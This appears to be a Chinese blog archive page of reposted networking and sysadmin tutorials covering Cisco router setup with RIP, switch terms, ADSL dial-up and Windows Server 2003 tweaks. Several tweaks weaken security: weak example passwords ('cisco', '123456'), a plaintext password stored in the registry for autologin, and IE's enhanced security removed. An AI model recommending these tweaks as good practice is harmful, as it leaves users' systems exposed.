testBJ(config)# enable password和enable secret命令可以修改特权模式的密码。 testBJ(config)#enable password cisco testBJ(config)#enable secret cisco 进入line console局部配置模式下,修改console登录密码;进入line vty局部配置模式,修改telnet登录的密码。login命令指出需要登录,修改密码的命令都是password。 testBJ(config)#line console 0 testBJ(config-line)#login testBJ(config-line)#password cisco testBJ(config-line)#exit testBJ(config)#line vty 0 4 testBJ(config-line)#login testBJ(config-line)#password cisco 测试连通性 打开其余两台路由器,按上述方法进行配置,然后就可以检查它们之间是否连通了。 测试线路连通性的方法有三种,ping、traceroute和telnet。ping可以检测目的地是否可达;trace不仅检测连通性,还给出到达目的地所经过的路径;telnet测试应用层软件的连通性,如下所示。 testBJ#ping 172.16.4.2 Type escape sequence to abort. Sending 5, 100-byte ICMP Echos to 172.16.4.2, timeout is 2 seconds: !!!!! Success rate is 100 percent (5/5), round-trip min/avg/max = 24/25/28 ms testBJ#traceroute 172.16.4.2 Type escape sequence to abort. Tracing the route to 172.16.4.2 1 172.16.2.2 16 msec 16 msec * testBJ#telnet 172.16.4.2 Trying 172.16.4.2 ... Open User Access Verification Password: testTJ> 172.16.4.2是路由器testTJ上的一个端口,我们在testBJ上运行上述三个命令,得知它运行正常。 显示当前状态 为了使网络管理员能够方便地了解路由器的状态,CISCO路由器提供了丰富的show命令。我们在这里介绍最简单的几个,如下所示。 show version命令显示路由器的硬软件版本号及配置信息。 show flash:命令相当于DOS的dir命令,显示flash中包含的文件信息。 show interface命令显示网络接口的状态。 配置路由器的过程中,最重要的一个show命令莫过于查看配置文件的内容,可以用show命令查看running-config或startup-config,如下所示。 show running-config show startup-config 配置文件是一个文本文件,其中包含着你键入的每一条配置命令。可以将配置文件下载到计算机上,用文本编辑器修改之后,再传回路由器。 三、RIP要配什么 IP地址配置 我们可以使用interface命令进入局部配置模式,然后利用ip address设置接口的IP地址。如下所示。 testBJ#conf t Enter configuration commands, one per line. End with CNTL/Z. testBJ(config)#interface e0/1 testBJ(config-if)#ip address 172.16.1.2 255.255.255.0 testBJ(config-if)# 为了便于配置和记忆,你还可以给每个端口添加一些描述信息。如下所示,在端口局部配置模式下使用description命令。 testBJ(config-if)#description connect to testSH testBJ(config-if)#end testBJ# 有些网络是NBMA(Non-Broadcast MultiAccess,非广播多路访问)的,即网络上不允许广播传送数据。对于这种网络,RIP就不能依赖广播传递路由表了。解决方法有很多,最简单的是指定邻居(neighbor),即指定将路由表发送给某一台特定的路由器。 有些网络是NBMA(Non-Broadcast MultiAccess,非广播多路访问)的,即网络上不允许广播传送数据。对于这种网络,RIP就不能依赖广播传递路由表了。解决方法有很多,最简单的是指定邻居(neighbor),即指定将路由表发送给某一台特定的路由器。 RIP配置 RIP是最容易配置的路由协议。配置它只需要两步操作,首先,指定使用RIP协议,然后,声明所连接的网络号,如下所示。 testBJ(config)#router rip testBJ(config-router)#network 172.16.0.0 testBJ(config-router)#end testBJ# router rip命令用于指定使用RIP协议,network命令声明网络号,由于RIP是一个有类路由协议,所以不必声明各个子网号。 对每一台路由器重复上述操作,一个使用RIP路由的网络就建成了。 测试配置正确性 配置RIP之后,要检查数据是否可以被正确路由。除了可以使用上面提到的连通性测试工具之外,还有以下几个命令: ? sh ip route用于检测路由表; ? sh ip protocols用于检查路由协议状况; ? debug ip rip用于调试RIP协议信息。 使用sh ip route命令显示各台路由器的路由表。 testBJ#sh ip route Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2 E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, * - candidate default, U - per-user static route, o - ODR Gateway of last resort is not set 172.16.0.0/24 is subnetted, 4 subnets R 172.16.4.0 [120/1] via 172.16.2.2, 00:00:12, Serial1/0 C 172.16.1.0 is directly connected, Ethernet0/1 C 172.16.2.0 is directly connected, Serial1/0 R 172.16.3.0 [120/1] via 172.16.1.3, 00:00:09, Ethernet0/1 [120/1] via 172.16.2.2, 00:00:22, Serial1/0 上面显示的是北京路由器的路由信息。字母C开头的是直接相连的网络,有172.16.1.0和172.16.2.0,分别连接在e0/1和s1/0端口上。字母R开头的是RIP协议学习到的路由,有172.16.3.0和172.16.4.0,其中,到172.16.3.0有两条路径供选择,分别经由 testSH和testTJ路由器。对比网络拓扑图,可以看出实际情况与设计的完全一致。 中括号里的内容是路由项的管理距离和度量值,RIP的缺省管理距离是120,到达3、4子网的度量值是1,即经过1个路由器可达。 同样的命令在另外两台路由器上运行,结果如下。 testSH#sh ip route Gateway of last resort is not set 172.16.0.0/24 is subnetted, 4 subnets R 172.16.4.0 [120/1] via 172.16.3.2, 00:00:13, Ethernet0/0 C 172.16.1.0 is directly connected, Ethernet0/1 R 172.16.2.0 [120/1] via 172.16.1.2, 00:00:11, Ethernet0/1 [120/1] via 172.16.3.2, 00:00:13, Ethernet0/0 C 172.16.3.0 is directly connected, Ethernet0/0 testTJ#sh ip route Gateway of last resort is not set 172.16.0.0/24 is subnetted, 4 subnets C 172.16.4.0 is directly connected, Ethernet0/0 R 172.16.1.0 [120/1] via 172.16.3.3, 00:00:07, Ethernet0/1 [120/1] via 172.16.2.3, 00:00:19, Serial1/0 C 172.16.2.0 is directly connected, Serial1/0 C 172.16.3.0 is directly connected, Ethernet0/1 分析上述命令输出时,一定要随时参照拓扑图,离开网络拓扑,上面的信息就没有任何意义。动态路由的灵活性体现在一条链路出现故障,路由算法会自动切换到迂回链路上。例如我们将testBJ和testTJ之间的串行线缆断开,一段时间后,再检查路由表,如下所示。 testBJ#sh ip route Gateway of last resort is not set 172.16.0.0/24 is subnetted, 3 subnets R 172.16.4.0 [120/2] via 172.16.1.3, 00:00:22, Ethernet0/1 C 172.16.1.0 is directly connected, Ethernet0/1 R 172.16.3.0 [120/1] via 172.16.1.3, 00:00:22, Ethernet0/1 我们发现串行链路所在的子网2断开了,到网络172.16.4.0网络的数据包都将绕经testSH路由器。 sh ip protocols命令可以显示当前路由协议的状况,如下所示。 testBJ#sh ip protocols Routing Protocol is "rip" Sending updates every 30 seconds, next due in 19 seconds Invalid after 180 seconds, hold down 180, flushed after 240 Outgoing update filter list for all interfaces is not set Incoming update filter list for all interfaces is not set Redistributing: connected, rip Default version control: send version 1, receive any version Interface Send Recv Key-chain Ethernet0/1 1 1 2 Serial1/0 1 1 2 Routing for Networks: 172.16.0.0 Routing Information Sources: Gateway Distance Last Update 172.16.2.2 120 00:00:05 172.16.1.3 120 00:00:27 Distance: (default is 120) 从命令输出中,可以看出RIP协议的基本配置,还可以得知与当前路由器交换信息的路由器有testTJ(172.16.2.2)和testSH(172.16.1.3)两台路由器,上次接收路由信息分别在5秒和27秒之前。 要了解路由器之间交换路由信息的详情,可以使用debug ip rip命令。如下所示,输入命令后,隔一段时间,控制台上出现接收或者发送RIP广播的信息。 testBJ#debug ip rip RIP protocol debugging is on testBJ# RIP: received v1 update from 172.16.2.2 on Serial1/0 172.16.4.0 in 1 hops 172.16.3.0 in 1 hops RIP: received v1 update from 172.16.1.3 on Ethernet0/1 172.16.4.0 in 2 hops 172.16.3.0 in 1 hops RIP: sending v1 update to 255.255.255.255 via Ethernet0/1 (172.16.1.2) subnet 172.16.4.0, metric 2 subnet 172.16.2.0, metric 1 RIP: sending v1 update to 255.255.255.255 via Serial1/0 (172.16.2.3) subnet 172.16.1.0, metric 1 RIP: received v1 update from 172.16.1.3 on Ethernet0/1 172.16.4.0 in 2 hops 172.16.3.0 in 1 hops RIP: received v1 update from 172.16.2.2 on Serial1/0 172.16.4.0 in 1 hops 172.16.3.0 in 1 hops testBJ#no debug all All possible debugging has been turned off testBJ# 从上述信息中可以得到RIP广播的详情。路由器先是从testTJ收到子网3、4的信息,然后又从testSH收到子网3、4的信息。其中,到子网4走 testTJ一跳,走testSH两跳,所以,路由表中反映出来的是经由testTJ到子网4;到子网3的距离都是一跳,所以,路由表中有两条并列的路由。 一段时间后,当前路由器的更新计时达到30秒,于是,它在两条链路上广播自身的路由表信息。注意,广播路由更新时,RIP采用了水平分割机制,从一个端口上学得的信息就不在这个端口上进行广播,所以当前路由器testBJ只发送子网172.16.1.0的路由信息。 使用no debug all命令结束调试信息的显示。需要注意的是debug命令非常消耗路由器资源,所以不要在通讯繁忙的路由器上使用,否则,路由器就会象死机一样停止反应。 怎么样,你看一遍这篇文章用了多少时间。下面可以找几台路由器,试着配置一下,不是很困难吧。 体会网络连通时的乐趣,将这里作为你学习路由器的起点,IGRP、OSPF、HSRP等等 crazy08 发表于 >2006-11-3 8:43:37 保存该日志到本地 [全文] [评论] [引用] [推荐] [档案] [推给好友] [收藏到网摘] 2006-11-3 路由器基础知识点汇总学习 [转] 一、路由器配置途径 可以通过以下几个途径来配置路由器: 1. 用主控Console口接终端配置。 2. 在AUX口接一Modem同电话网相连,在远端配置。 3. 在TCP/IP网上可通过仿真终端(virtual termianl)telnet配置 4. 可以从TFTP Server上下载配置。 5. 可以用网管工作站进行配置。 如何利用Console口来配置一台路由器 利用一台终端(或安装有异步通信程序软件的微机),利用Cisco提供的电缆和接头,分别接在路由器的Console口上及经过正确配置的终端或微机的串行口上,就可对路由器进行配置。终端或微机串行口的配置为: VT100 仿真 9600速率 无校验位 8数据位 1停止位 二、路由器的内存和作用 路由器内存的种类 路由器的内存有三类:RAM(Random Access Memory),NVRAM(Non-Volatile Random Access Memory)及EEPROM(Electronic Erasable Programmable Random Access Memory,又称为Flash)。 Flash:存储路由器的操作系统(IOS:Internet Operating system)。 NVRAM:存储用户对路由器的配置表。 RAM:路由器在加电后,配置表被从NVRAM中调入RAM中,并控制路由器的活动;存放路由器路由表及数据缓冲区。 NVRAM同RAM的区别 用户对路由器配置的更改在RAM中进行 用户在存储配置表后,RAM将配置表的拷贝放置在NVRAM中 路由器掉电后,RAM的内容将丢失,NVRAM的内容将被保留。 三、路由器的口令 enable secret /enable password 是当用户从用户执行状态进入超级用户状态时,需要输入的口令 区 别: 1. 当enable secret 存在时,enable password不起作用 2. 查看配置表时,时,enable secret为加密格式,enable password为正常格式 vty password 用户以telnet方式进入路由器时,需要输入的口令 dial-in password 用户以拨号方式进入路由器时,需要输入的口令 四、路由器系统配置 交互配置模式 所有路由器在系统加电后,都会进入路由器交互式对话配置模式,该配置模式可以完成对路由器的一般配置。 命令行方式配置路由器 根据不同牌子、不同型号的路由器采取相应的命令行进行配置。 路由器知识对与想向高端网络技术发展的朋友来说是必不可少的。本人在一家网络公司工作,对华为和CISCO的路由产品接触不少,相信很多朋友和我一样很急需这方面的知识……………… 路由器是一种连接多个网络或网段的网络设备,它能将不同网络或网段之间的数据信息进行“翻译”,以使它们能够相互“读”懂对方的数据,从而构成一个更大的网络。 路由器有两大典型功能,即数据通道功能和控制功能。数据通道功能包括转发决定、背板转发以及输出链路调度等,一般由特定的硬件来完成;控制功能一般用软件来实现,包括与相邻路由器之间的信息交换、系统配置、系统管理等。 多少年来,路由器的发展有起有伏。90年代中期,传统路由器成为制约因特网发展的瓶颈。ATM交换机取而代之,成为IP骨干网的核心,路由器变成了配角。进入90年代末期,Internet规模进一步扩大,流量每半年翻一番,ATM网又成为瓶颈,路由器东山再起,Gbps路由交换机在1997年面世后,人们又开始以Gbps路由交换机取代ATM交换机,架构以路由器为核心的骨干网。 crazy08 发表于 >2006-11-3 8:41:02 保存该日志到本地 [全文] [评论] [引用] [推荐] [档案] [推给好友] [收藏到网摘] 2006-11-3 学习交换机的基础专业术语 [转] 1. 交换机 交换机是用来实现交换式网络的设备,在ISO的OSI模型中,它是位于第二层——数据链路层的设备,能对帧进行操作,是一种智能型设备。 2. IEEE 802.3 以太网标准 3. IEEE 802.3u 快速以太网标准 4. IEEE 802.3ab 千兆以太网(非屏蔽双绞线)标准 5. IEEE 802.3z 千兆以太网(光纤、铜缆)标准 6. IEEE 802.3x 流量控制标准 7. IEEE 802.1X 基于端口的访问控制标准 8. IEEE 802.1q VLAN标准 9. IEEE 802.1p 流量优先权控制标准 10. IEEE 802.1d 生成树协议 11. 数据链路层 位于ISO/OSI参考模型第二层,负责在节点间的线路上通过检测、流量控制和重发等一系列手段无差错的传送一帧为单位的数据,使得从它的上一层(网络层)看起来是一条无差错的链路。 12. 全、半双工 在网络中,全双工是指接收与发送采用两个相互独立的通道,可同时进行,互不干扰。而半双工则是接收与发送共用一个通道,同一时刻只能发送或只能接收,所以半双工可能会产生冲突。我们所说的交换机是个全双工设备,而集线器是半双工设备。 13. MAC地址 MAC地址就是在媒体接入层使用的地址,通俗点说就是网卡(局域网节点)的物理地址。在网络底层的物理传输过程中,是通过物理地址来识别主机(局域网节点)的,它一般也是全球唯一的。现在的MAC地址一般都采用6字节48位。 14. IP地址 IP地址就是给每个连接在Internet上的主机分配的一个32bit地址。通过IP地址就可以访问到每一台主机。 15. 自适应/自协商(Auto-Negotiation) Auto-Negotiation标准使交换器按照以下顺序适应工作速率和工作模式:100M 全双工,100M半双工,10M全双工,10M半双工。 16. 全双工流量控制 遵循IEEE 802.3x标准,当网络拥塞时,网络设备利用预定义的Pause帧进行流控。 17. 半双工流量控制(背压技术Backpressure) 基于IEEE802.3x标准,当处理器发现缓冲器将要填满时,就向源发站发出一个假冲突信号,使之延迟一个随机时间,然后继续发送。能够缓解和消除拥塞。 18. 线速 交换机转发数据的理论最大值。19. 广播风暴控制 网络上的广播帧(由于被转发)数量急剧增加而影响正常的网络通讯的反常现象,广播风暴会占用相当客观的网络带宽,造成整个网络无法正常工作。广播风暴控制是允许端口对网络上出现的广播风暴进行过滤。开启广播风暴控制后,当端口收到的广播帧累计到预定门限值时,端口将自动丢弃收到的广播帧。当未启用该功能或广播帧未累计到门限时,广播帧将被正常广播到交换机的其它端口。 20. TRUNK(端口汇聚) 通常被用于将多个端口聚合在一起,从而形成一个高带宽的数据传输通道。交换机把聚集在一起的所有端口看作一个逻辑端口。 21. VLAN(Virtual Local Area Network,虚拟局域网) 是由一组终端工作站组成的广播域,处于同一VLAN的主机(交换机端口)才能互相通信,它不需要考虑具体布线结构就可以建立逻辑工作组。配置灵活,增加系统的安全性。 22. Port VLAN 基于端口的VLAN,处于同一VLAN端口之间才能相互通信。 23. Tag VLAN 基于IEEE 802.1Q,用VID来划分不同的VLAN。 24. VID(VLAN ID) VLAN的标识符,用于表示某个Tag VLAN。 25. MTU VLAN 在交换机的VLAN设置时,将每个用户所占用的端口与上行端口划分为一个单独的VLAN。 26. MAC地址老化时间 交换机中各端口具有自动学习地址的功能,通过端口发送和接收的帧的源地址(源MAC地址、交换机端口号)将存储到地址表中。老化时间是一个影响交换机学习进程的参数。从一个地址记录加入地址表以后开始计时,如果在老化时间内各端口未收到源地址为该MAC地址的帧,那么,这些地址将从动态转发地址表(由源 MAC地址、目的MAC地址和它们相对应的交换机的端口号)中被删除。静态MAC地址表不受地址老化时间影响。 27. 静态地址表 静态MAC地址区别与一般的由学习得到的动态MAC地址。静态地址一旦被加入,该地址在删除之前将一直有效,不受最大老化时间的限制。静态地址表记录了端口的静态地址。静态地址表中一个MAC地址对应一个端口,如果设置,则所有发给这个地址的数据只会转发给该端口。也成为MAC地址绑定。 28. SNMP 简单网络管理协议(Simple Network Management Protocol,简写为SNMP)是OSI第7层(应用层)的协议,用于远程监视和配置网络设备。SNMP使得网管工作站能够读取并修改网关、路由器、交换机,以及其他网络设备的设置值。 29. IGMP(Internet Group Management Protocol) IP通过使用交换机、组播路由器、支持IGMP的主机来管理组播通信。一组主机、路由器(或交换机)与属于同一个组播组的成员交流组播数据流。并且在这个组的所有设备使用同一个组播组地址。IGMP Snooping技术针对视频点播等应用,大幅提高网络利用率。在网络中,当为各种各样的多媒体应用进行 IP组播通信时,您可以通过在交换机每个端口上设置IGMP来减少不必要的带宽使用。 30. IEEE 802.1D/STP IEEE 802.1D 生成树协议(Spanning Tree Protocol)检测到网络上存在环路时,自动断开环路连接。当交换机间存在多条连接时,将只启动最主要的一条连接,而将其他连接都阻塞掉,将这些连接变为备用连接。当主连接出现问题时,生成树协议将自动起用备用连接接替主连接的工作,不需要任何人工干预。 31. IEEE 802.1X认证协议 基于端口的访问控制协议(Port Base Network Access Control Protocol)。该协议体系结构分为三部分:客户端、认证系统、认证服务器。我司网管型交换机内置802.1x认证系统和RADIUS客户端,为用户提供先进的计费方案。 crazy08 发表于 >2006-11-3 8:36:05 保存该日志到本地 [全文] [评论] [引用] [推荐] [档案] [推给好友] [收藏到网摘] 2005-9-16 ipc$详细解释大全[转] 一 crazy08 发表于 >2005-9-16 9:10:00 保存该日志到本地 [全文] [评论] [引用] [推荐] [档案] [推给好友] [收藏到网摘] 2005-9-12 ADSL [转] ADSL有关配置 最近以来,有个别同学出现使用ADSL+Win XP操作系统无法登陆的情况。经过这一段时间的处理与解决,发现引发这种问题的原因主要出在ADSL拨号配置上面,具体解决方法如下: 在进行虚拟拨号配置前,首先建议先检测一下网卡和Modem是否正常,使用命令: ping 127.0.0.1 检测本机网卡是否工作正常; ping 192.168.1.254(即ADSL Modem的网关,此IP是举例,具体要在说明书上查) 检测Modem是否工作正常。 建议采用Win 2000专业版+ADSL拨号方式接入网络。 1.在Win 2000下配置ADSL拨号方式:首先需要专用PPPOE(Point-to-Point Protocol over Ethernet以太网上的点对点协议)虚拟拨号工具,如Enternet 500(或其它类似工具,均可以从网上下载,::URL::http://www.xx.hn.cn/download/enter500.zip)来建立虚拟拨号连接,步骤如下: 双击下载下来的文件enter500.exe,出现以下画面: 点击“安装” 按钮,出现下面画面,完成文件解压: 解压完成后,进入enter500目录,点击SETUP.EXE文件完成软件安装,在出现如下窗口时,点击“完成”按钮,并且重新启动电脑: 电脑重新启动后,选择并双击桌面上的 EnterNet 500 兰色图标, 在出现的窗口中选择 “建立新配置文件(Create New Profile)”图标并双击,: 输入 ADSL 拨号方式连接名,例如:“我的连接”或“ADSL”等等都可以,然后点击“下一步”按钮 : 在接下的窗口中输入正确的用户名和密码,密码需要输入两次,此例子中公共用户为adsl@xx.com,密码是adsl: 出现下面的窗口,继续按 下一步 按钮,转入下一窗口: 点击下面窗口中的“完成”按钮,进入下一窗口: 现在,在如下的“配置文件 - EnterNet 500” 窗口中出现新图标 adsl ,选择并双击此图标,打开此虚拟拨号连接: 在如下的拨号窗口中点击 连接 按钮,建立 ADSL PPPOE 呼叫: 呼叫建立成功之后,在计算机右下角会出现如下连接图标, ,双绿色小图标,出现如下窗口,表示成功连接,此时,就可以上网浏览,并访问网络学院,登陆网上学习了;点击“中断”按钮可以挂断连接。 2.在Win XP下配置ADSL拨号方式:(不推荐使用) 在Win XP系统中,已经自带了ADSL的PPPOE虚拟拨号功能,因此,不用安装其它虚拟拨号工具即可进行网络连接的配置,具体步骤如下: 首先到“控制面板”里面的“网络连接”项目,双击出现下面的窗口,点击左边的“创建一个新的连接”的链接 : 之后出现下面的窗口,按照图片,一步步继续下去: 在下面窗口输入ISP名称,例如“chinatelecom” 或者“中国电信”等等,可随意: 输入用户名和密码,此例子中为adsl@xx.com,密码为adsl, 注意密码要输入两次: 点击上图中的“完成”按钮后,桌面会出现下面连接图标: 双击以上图标,出现下面窗口后,可以点击“连接”按钮连接到因特网,此时,就可以上网浏览,并访问网络学院,登陆网上学习了。 通过以上配置,均可以访问网络学院并正常登陆,应当注意的是在Win 2000/XP下,不要使用VLAN直接连接到网络上,即通过ADSL Modem内置PPPOE路由上网,最好使用拨号方式上网,通过路由接入的方式有可能会导致无法登陆网络学院网上学习的问题。如果以上方法均解决不了问题,在上网时其它网页均可以正常访问,而只有网院的登陆不成功,问题可能就出在ADSL Modem上面,建议重启Modem,将Modem恢复成出厂设置后再试试;如果问题依旧,建议更换Modem再按照以上配置试试。 crazy08 发表于 >2005-9-12 18:10:22 保存该日志到本地 [全文] [评论] [引用] [推荐] [档案] [推给好友] [收藏到网摘] 2005-9-12 win 2003 全面优化Windows2003 相对于Microsoft前一个服务器操作系统平台——Windows 2000 Server Family,Windows 2003 Server Family提供了更为优良的系统性能,突出表现在服务器系统相对敏感的三个环节——速度、稳定性和安全性。相对于2000 Server,2003 Server对系统的硬件配置要求并没有大的提升,足够的物理内存是保证其稳定快速运行的前提,256M应该是个基本的要求。在相同的硬件配置下,2003 Server的开机速度更快,应用程序的执行速度也有不错的表现。2003 Server平台秉承了 2000 Server良好的稳定性,同时将2000 Server在使用中暴露的大量安全漏洞进行了修正,系统采用了更为严格的安全机制和默认配置,进一步提高了系统的安全性。在界面方面与传统模式下的XP系统界面极为类似:一、禁用开机 CTRL+ALT+DEL “开始-->运行”在弹出的窗口中输入gpedit.msc,点击确定即打开了组策略编辑器。在组策略编辑器的左框内依次序展开(点前面的“+”号)-->计算机配置-->Windows设置-->安全设置-->本地策略,这时在本地策略下面可见到有“安全选项”,点击“安全选项”在右侧的框内找到“交互式登录:不要按CTRL+ALT+DEL”右键点击“交互式登录:不要按CTRL+ALT+DEL”,在弹出的菜单中点“属性”,在属性选项卡中点击“已启用”前的圆圈以选取它。确认“已启用”前面的圆圈中在一黑色小点后,点击“确定”,然后关闭窗口。这样以后启动计算机时就不必按“CTRL+ ALT+DEL”组合键登陆了。二、关闭Windows Server 2003的关机提示点桌面任务栏的“开始-->运行”在弹出的窗口中输入gpedit.msc,点击确定即打开了组策略编辑器。在组策略编辑器的左框内依次序展开(点前面的“+”号)-->计算机配置-- >管理模板,这时在“管理模板”下面可见到有“系统”(如果“管理模板”下面只有“网络”和“打印机”没有“系统”项目,请右键点击“管理模板”在弹出的菜单中点击“添加/删除模板”打开添加/删除模板窗口,再点击“添加”在弹出的对话框中选中“system.adm”后点“打开”,关闭添加/删除模板窗口,这时在“管理模板”下面可见到有“系统”),点击“系统”,在右侧的框内找到<显示“关机事件跟踪程序”>项目;右键点击 “<显示“关机事件跟踪程序”>”,在弹出的菜单中点“属性”,在属性选项卡中点击“已禁用”前的圆圈以选取它。再点击确定,这样以后关闭计算机就不会再出现关机事件跟踪对话框。三、禁用限制可保留带宽开始菜单→运行→键入 gpedit.msc ,出现“组策略”窗口, 展开“计算机管理”--> "管理模板”→“网络” , 点击 "QoS 数据包调度程序", 在右边窗右键单击“限制可保留带宽" ,在属性中的 “设置”中有“限制可保留带宽" ,选择“已禁用”,确定即可。四、启用声音驱动安装完成后,在Windows 2003标准版中就可以正常使用声卡了,而在企业版中,系统还是不能发声。解决步骤是:进入“控制面板→声音和音频控制设备”,勾选“音频服务”选项,点“确定”后重启计算机即可。再次打开“控制面板→声音和音频控制设备”,这时你会发现这里多了很多选项。在“音量”选项卡中,把“将音量图标放入任务栏”前面的空格打上勾,然后点“应用”,任务栏就多了一个音量图标.接着点击“声音”选项卡中选择声音方案为“Windows 默认”,然后点“应用”即可. 五、解决播放画面图象差及声卡不工作或者打游戏时声音严重滞后 1、安装DirectX 9.0b 在Windows Server 2003上安装DirectX 9a和在其他版本的Windows上安装DirectX 9a的方法是一样的。安装之前先在系统管现--服务中启用DirectX and Graphics Acceleration服务。 下载:DirectX 9.0a Websetup地址∶ ::URL::http://www.microsoft.com/downloads/details.aspx?familyid=141d5f9e-07c1-462a-baef-5eab5c851cf5&displaylang=zh-cn 2、硬件加速:右键点击桌面-->属性 --> 设置-->高级--疑难解答。把该页面的硬件加速滚动条拉到“完全”,最好点击“确定”保存退出。这期间可能出现一瞬的黑屏是完全正常。 3、 DirectX加速:打开“开始”-->“所有程序”-->附件-->系统工具-->单击“系统信息”,在系统信息窗口中点击 “工具”,在弹出的菜单中点击“DirectX 诊断工具”,即打开“DirectX 诊断工具”(DirectX Tools)窗口,在“显示”选项卡,分别点击“DirectDraw”、“ Direct3D ”和“ AGP Texture” 加速按钮,使三个按钮启用加速。 4.启用声音后,在“DirectX诊断工具”窗口中,选择“声音”选项卡,在“加速级别”中将游标向右拖动到“完全加速”,即可。六、取消Internet Explorer增强的安全配置 新安装好Windows Server 2003操作系统后,打开浏览器来查询网上信息时,发现IE总是“不厌其烦”地提示我们,是否需要将当前访问的网站添加到自己信任的站点中去;要是不信任的话,就无法打开指定网页;倘若信任的话,就必须单击“添加”按钮,将该网页添加到信任网站的列表中去。不过每次访问网页,都要经过这样的步骤,显然就太烦琐了。其实我们可以通过下面的方法来让IE取消对网站安全性的检查: 1、依次点击“开始”-->“设置”-->“控制面板”,在打开的控制面板窗口中,用鼠标双击“添加或删除程序”图标,然后点击“添加和删除Windows组件”将界面切换到“添加和删除Windows组件”页面中; 2、用鼠标选中“Internet Explorer增强的安全配置”选项,将它前面方格内的勾去除,然后单击“下一步”按钮,就能将该选项从系统中删除了; 3、再单击一下“完成”按钮,退出组件删除提示窗口。 以后,再上网的时候,IE就不会自动去检查网站的安全性了,这样就能少了不少麻烦。 七、重命令系统管理员帐户在Windows sever 2003系统中,每次开机都要以管理员Administrator的身份才能登陆系统。这样的名称不利于各种登陆操作,那么在WINDOWS SEVER 2003系统中如何使用自定义的用户名登陆系统,方法如下∶ 1. 开始—运行—键入 “gpedit.msc” ,然后点击“确实”打开“组策略”窗口。在“组策略”窗口的左框内依次序展开∶计算机配置--> Windows设置-->安全设置-->本地策略-->安全;点击“安全”选项后,在窗口的右框中找到“帐户∶重命名系统管理员帐户”,然后双击它,在出现的对话框中输入你用来取代Administrator的帐户名称,如∶Abc 2.重新启动计算机,在第一次出现的登陆窗口中将Administrator清除改成你定义好的帐户名称Abc,使用你原来的Administrator的帐户密码,登陆系统,如果不使用新系统管理员帐号登陆会报错,因为Administrator的帐户已经没有了、。这样你以后登陆都显示这个用户名,其它的登陆方式也使用这个用户名。八、在Windows 2003系统调用Windows XP风格界面(会消耗一定的系统资源) 1、在系统的开始菜单中,依次展开“开始”-->控制面板-->管理工具-->服务,在服务窗口中,在对应服务的右边子窗口中,用鼠标选中 “Themes”选项;我们启动该服务;用鼠标双击该服务选项,然后打开常规标签页,将对应该服务的启动类型设置为“自动”,再点一下“应用”按钮;此时,“服务状态”设置项中的“启动”按钮就自动被激活了,单击该“启动”按钮,就能将系统中的Themes服务起用了;关闭窗口。 2、用鼠标右键单击桌面空白处,从快捷菜单中执行“属性”命令,再打开“外观”标签页面,在其中的“窗口和按钮”处,选中Windows XP样式。 3. 右键点击“我的电脑”-->“属性”-->高级-->性能-->视觉效果-->调整为最佳外观。至此,系统中的工具栏菜单、窗口等样式就会按照指定的风格来显示了。九、开启server 2003自动登录功能 每次开机运行Windows Server 2003系统时,都需要同时按住复合键,再输入登录密码,才能进入到系统中;要是需要频繁登录系统的话,大家可能就会受不了这样罗嗦的步骤了。此时,大家不妨按照下面的步骤,来让系统自动完成登录操作: 1、在运行对话框中,输入注册表编辑命令regedit,来打开注册表编辑窗口; 2、在该窗口中,依次展开HKEY_LOCAL_MACHINES\SOFTWARE\Microsoft\WindowsNT\Current Version\WinLogon键值; 3、在对应右边的子窗口中,用鼠标右键单击空白处,从弹出的快捷菜单中,依次执行“新建”/“字符串”命令,来创建一个字符串类型的键名,并将键名设置为“AutoAdminLogon”,并将该键名的数值设置为“1”; 4、找到“DefaultDomainName”键名,并用鼠标双击之,在随后出现的窗口中,输入要登录的域名,例如Department; 5、双击“DefaultUserName”键名,在随后打开的窗口中,直接输入要登录到此域的用户名,例如“test”; 6、在WinLogon右边的子窗口中,用鼠标右键单击空白处,从弹出的快捷菜单中,依次执行“新建”/“字符串”命令,来创建一个字符串类型的键名,并将键名设置为“DefaultPassword”,并将该键名的数值设置为用户登录系统的密码,例如用户test的登录密码为“123456”; 7、完成设置后,重新启动计算机时,我们会发现不需要再登录,就能自动进入到Windows Server 2003系统中了。以后要取消自动登录功能的话,可以将“AutoAdminLogon”键值设置为“0”就可以了。 十、跳过磁盘检修等待时间(个人认为不用改) 一旦计算机因意外原因,例如突然停电或者死机的话,那么计算机下次重新启动的话,系统就会自动运行磁盘扫描程序,检查磁盘是否有错误出现。要是你不想等待下去的。可以跳过这段检查等待时间: 1、在开始菜单中,依次执行“程序”-->“附件”-->“命令提示符”命令,将界面切换到DOS命令行状态下; 2、在DOS命令行状态下直接输入“CHKNTFS/T :0”命令,单击回车键后,系统就能自动将检查磁盘的等待时间修改为0了。下次遇到异常情况,重新启动计算机后,系统再调用磁盘扫描程序时,就不需要等待了。 十一、解决运行大型软件时系统反应缓慢右键点击“我的电脑”-->属性-->高级-->性能-->设置-->高级,把“处理器计划”和内存使用分配给“程序”使用。然后点击“确定” 十二、禁用错误报告右键点击“我的电脑”-->属性-->高级-->点击“错误报告”按钮,在出现的窗口中把“禁用错误报告”选上并复选“但在发生严重错误时通知我” 十三、调整虚拟内存正常运行Windows所需要的虚拟内存是作为物理内存的“后备力量”而存在的,虽然运行速度上硬盘不如内存,但在容量上内存是无法与硬盘相提并论的。所以我们一直是认为虚拟内存越大越好,其实事实上并不是这样的,尤其是安装Windows server 2003用做工作站的环境下并不承担高负荷工作的情况下,我们可以试试禁用虚拟内存。前提是你必须拥有512M物理内存以上。很多朋友担心如果禁用虚拟内存会不会象在Windows 9x环境下一样造成系统无法正常待机和休眠的情况,其实不会这样的,因为从windows xp开始它的虚拟内存(即pagefile.sys)是专用于数据交换的,待机模式时数据依旧保留在物理内存中,休眠模式也有其专用的休眠文件(Hiberfil.sys),所以绝对不会出现系统无法休眠的问题。而使用 Windows server 2003的一些朋友经常会对其的关机和注销缓慢感到束手无策,在此我个人的解决办法就是禁用虚拟内存,这样你的注销和关机时间可能会加快很多。我做了测试,在加载虚拟内存的情况下注销用户重登陆windows的时间是3秒,关机是23秒。但是在禁用虚拟内存的情况下注销重登陆的时间减少到2秒,而关机时间缩短到3秒。 右键点击“我的电脑”-->属性-->高级-->性能-->设置-->高级,点击“虚拟内存”部分的“更改”,然后在出现的窗口选择“无分页文件”。重启系统即可。 